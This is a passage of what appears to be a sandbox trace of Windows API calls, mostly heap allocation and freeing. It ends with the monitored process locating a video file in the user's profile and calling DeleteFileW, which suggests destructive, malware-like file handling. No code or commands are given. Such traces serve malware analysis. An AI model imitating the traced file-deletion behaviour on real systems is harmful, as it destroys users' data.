wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0258.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0258.654] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0258.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0258.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0258.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0258.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0258.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0258.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0258.655] CloseHandle (hObject=0x2cc) returned 1 [0258.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0258.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0258.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0258.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0258.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0258.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0258.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0258.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0258.656] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0258.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0258.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0258.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0258.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0258.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0258.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0258.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0258.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0258.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0258.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0258.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa970 [0258.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa268 [0258.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5c8 [0258.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0258.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa00 [0258.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0258.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0258.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa448 [0258.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0258.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.658] CloseHandle (hObject=0x2d0) returned 1 [0258.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0258.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3561010 | out: hHeap=0x25c0000) returned 1 [0258.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0258.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0258.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0258.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0258.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0258.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0258.660] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0258.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0258.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0258.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0258.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0258.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0258.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0258.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0258.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0258.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0258.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0258.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0258.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0258.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0258.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0258.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0258.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0258.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0258.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0258.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0258.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0258.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0258.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0258.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0258.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0258.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0258.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0258.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0258.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0258.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0258.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0258.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0258.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0258.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0258.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0258.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0258.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0258.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0258.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0258.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0258.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0258.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0258.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0258.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0258.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0258.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0258.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0258.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0258.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0258.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0258.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0258.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0258.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0258.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0258.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0258.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0258.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0258.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0258.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0258.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0258.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0258.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0258.667] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0258.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0258.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0258.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0258.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0258.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0258.667] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0258.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0258.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6d0 [0258.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0258.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0258.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7f0 [0258.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0258.667] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0258.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0258.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0258.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0258.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0258.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0258.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0258.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0258.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0258.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0258.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0258.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0258.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0258.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0258.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0258.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x78) returned 0x24f5278 [0258.669] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/EzPWeTUYQ0o54TxyD5.mkv", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\EzPWeTUYQ0o54TxyD5.mkv", lpFilePart=0x8bedfc*="EzPWeTUYQ0o54TxyD5.mkv") returned 0x3b [0258.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0258.669] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\EzPWeTUYQ0o54TxyD5.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ezpwetuyq0o54txyd5.mkv")) returned 0x20 [0258.669] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\EzPWeTUYQ0o54TxyD5.mkv", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9fddf00, ftCreationTime.dwHighDateTime=0x1d4d364, ftLastAccessTime.dwLowDateTime=0xbed2aea0, ftLastAccessTime.dwHighDateTime=0x1d4c7ea, ftLastWriteTime.dwLowDateTime=0xbed2aea0, ftLastWriteTime.dwHighDateTime=0x1d4c7ea, nFileSizeHigh=0x0, nFileSizeLow=0x15e14, dwReserved0=0x18e2, dwReserved1=0x4, cFileName="EzPWeTUYQ0o54TxyD5.mkv", cAlternateFileName="EZPWET~1.MKV")) returned 0xaa5820 [0258.669] DeleteFileW 